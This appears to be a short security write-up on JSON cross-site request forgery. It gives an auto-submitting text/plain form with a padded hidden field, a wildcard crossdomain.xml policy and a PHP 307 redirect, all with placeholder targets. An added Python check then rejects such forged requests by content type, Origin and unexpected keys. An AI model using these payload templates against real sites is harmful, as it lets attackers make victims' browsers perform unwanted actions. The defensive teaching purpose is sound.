JSON CSRF: CSRF that no one talks about

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://site url" method="POST" enctype="text/plain">
<input type="hidden" name='{<json data>,"padding":"' value='something"}' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>

<?php
// redirect automatically
header("Location: https://victim.com/user/endpoint/", true, 307);
?>
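
Added example, not from the original article: a server-side check in Python that refuses the request generated by the text/plain form above, and also refuses a JSON request that arrives from a foreign origin. `check_json_request`, the allowed origin, the `email` field and the sample requests are assumptions constructed for illustration.

```python
import json

# Assumptions for this sketch: the site's own origin and the endpoint's fields.
ALLOWED_ORIGINS = {"https://app.example.test"}
EXPECTED_KEYS = {"email"}

def check_json_request(headers, body):
    """Return (accepted, reason) for a state-changing JSON endpoint."""
    h = {k.lower(): v for k, v in headers.items()}
    # 1. Only application/json is accepted; a form can send text/plain,
    #    multipart/form-data or application/x-www-form-urlencoded.
    media_type = h.get("content-type", "").split(";", 1)[0].strip().lower()
    if media_type != "application/json":
        return False, "content-type"
    # 2. The media type alone is not proof of same-origin: a 307 redirect
    #    replays method and body, so the Origin header is checked as well.
    #    A missing Origin is refused (assumption: browser-only endpoint).
    if h.get("origin") not in ALLOWED_ORIGINS:
        return False, "origin"
    # 3. The body must be an object with known keys only; the form trick
    #    always leaves an extra key behind ("padding" in the form above).
    try:
        data = json.loads(body)
    except ValueError:
        return False, "json"
    if not isinstance(data, dict) or set(data) - EXPECTED_KEYS:
        return False, "unexpected-keys"
    return True, "ok"

# Constructed sample: what a browser sends for the text/plain form, i.e.
# name + "=" + value + CRLF, with a made-up payload in place of <json data>.
FORM_BODY = '{"email":"a@example.test","padding":"=something"}\r\n'
FORM_HEADERS = {"Content-Type": "text/plain",
                "Origin": "https://other.example.test"}
# Constructed sample: JSON media type, but sent from a foreign origin.
FOREIGN_HEADERS = {"Content-Type": "application/json",
                   "Origin": "https://other.example.test"}
# Constructed sample: the application's own front end.
OWN_HEADERS = {"Content-Type": "application/json; charset=utf-8",
               "Origin": "https://app.example.test"}
OWN_BODY = '{"email":"a@example.test"}'

if __name__ == "__main__":
    print(json.loads(FORM_BODY))  # the form body is well-formed JSON
    for hdrs, body in ((FORM_HEADERS, FORM_BODY),
                       (FOREIGN_HEADERS, OWN_BODY), (OWN_HEADERS, OWN_BODY)):
        print(check_json_request(hdrs, body))
```

The form body parses as valid JSON, so an endpoint that ignores Content-Type would process it; the three checks together are what reject it.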
